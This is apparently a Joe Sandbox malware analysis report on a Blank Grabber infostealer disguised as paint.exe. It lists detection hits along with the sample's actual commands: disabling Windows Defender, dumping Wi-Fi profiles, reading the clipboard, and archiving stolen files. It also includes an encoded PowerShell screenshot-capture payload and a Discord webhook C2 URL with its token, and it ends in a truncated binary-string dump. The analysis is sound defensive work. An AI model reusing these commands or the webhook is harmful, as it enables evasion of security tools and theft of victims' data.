Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\paint.exe", ParentImage: C:\Users\user\Desktop\paint.exe, ParentProcessId: 2132, ParentProcessName: paint.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7716, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\paint.exe, ProcessId: 2132, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\paint.exe, ProcessId: 2132, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\paint.exe, ProcessId: 2132, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8364, TargetFilename: C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline

Sigma detected: Files Added To An Archive Using Rar.EXE

Source: Process started

Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5956, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *, ProcessId: 7908, ProcessName: rar.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3584, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 1780, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\paint.exe", ParentImage: C:\Users\user\Desktop\paint.exe, ParentProcessId: 2132, ParentProcessName: paint.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7772, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: paint.exe.2132.1.memstrmin

Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1325366706595561574/vQDeUuP3YNG10jqpqcayt14YabeOslGKlq6YRX-VMaSv1X0716_bmr9KcFyMQ8vNYrim"}

Multi AV Scanner detection for submitted file

Source: paint.exe	Virustotal: Detection: 43%			Perma Link
Source: paint.exe	ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe

Code function: 88_2_00007FF623DE901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

88_2_00007FF623DE901C

Source: paint.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669915105.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: paint.exe, 00000000.00000003.1667071030.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: ucrtbase.pdb source: paint.exe, 00000001.00000002.2017036529.00007FFE01431000.00000002.00000001.01000000.00000004.sdmp, ucrtbase.dll.0.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666577490.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668811885.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669443870.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667653632.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669527787.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667295052.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669359643.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: paint.exe, 00000001.00000002.2019605876.00007FFE13201000.00000040.00000001.01000000.00000007.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669443870.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668000364.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666390451.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1670177591.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668921713.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667896960.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: paint.exe, 00000001.00000002.2018668375.00007FFE126EB000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668215242.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: api-ms-win-core-file-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669359643.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: paint.exe, 00000000.00000003.1670177591.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: paint.exe, 00000001.00000002.2015768208.00007FFDFB5D0000.00000040.00000001.01000000.00000005.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667196677.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668811885.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: paint.exe, 00000000.00000003.1668691836.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667896960.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: paint.exe, 00000001.00000002.2020696017.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668427752.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1670060557.0000023393142000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: paint.exe, 00000000.00000003.1668113578.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.pdbhP source: powershell.exe, 0000002F.00000002.1831220495.000001B38AF36000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666577490.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667479832.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667816772.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: paint.exe, 00000001.00000002.2019344015.00007FFE130C1000.00000040.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668318561.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666390451.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669826746.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1670514489.0000023393149000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667397043.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668542158.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668318561.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: paint.exe, paint.exe, 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669527787.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: paint.exe, 00000000.00000003.1670060557.0000023393142000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: paint.exe, paint.exe, 00000001.00000002.2017200622.00007FFE10231000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669612064.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667653632.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, 